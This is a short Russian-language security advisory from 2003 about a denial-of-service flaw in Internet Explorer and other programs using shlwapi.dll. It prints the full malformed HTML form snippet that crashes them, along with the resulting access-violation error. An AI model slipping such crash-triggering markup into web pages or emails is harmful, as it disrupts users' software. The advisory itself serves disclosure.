Security Lab

DoS чистым HTML в Internet Explorer

Дата публикации:23.04.2003
Всего просмотров:1660
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Internet explorer при обработке некорректной формы. Уязвимость позволяет аварийно завершить работу Internet explorer и связанных программ.

Как сообщается, следующий код чистого HTML приведет к аварийному завершению работы Internet explorer, Outlook, Frontpage и других программ, использующих библиотеку shlwapi.dll для обработки HTML кода:

<html>
<form>
<input type crash>
</form>
</html>
После краха программы, будет отображена следующая ошибка:
"Unhandled exception in iexplore.exe (SHLWAPI.DLL): 
0xC0000005: Access Violation"
Ссылки: IE / Outlook / MS SHLWAPI Render - more trivial crash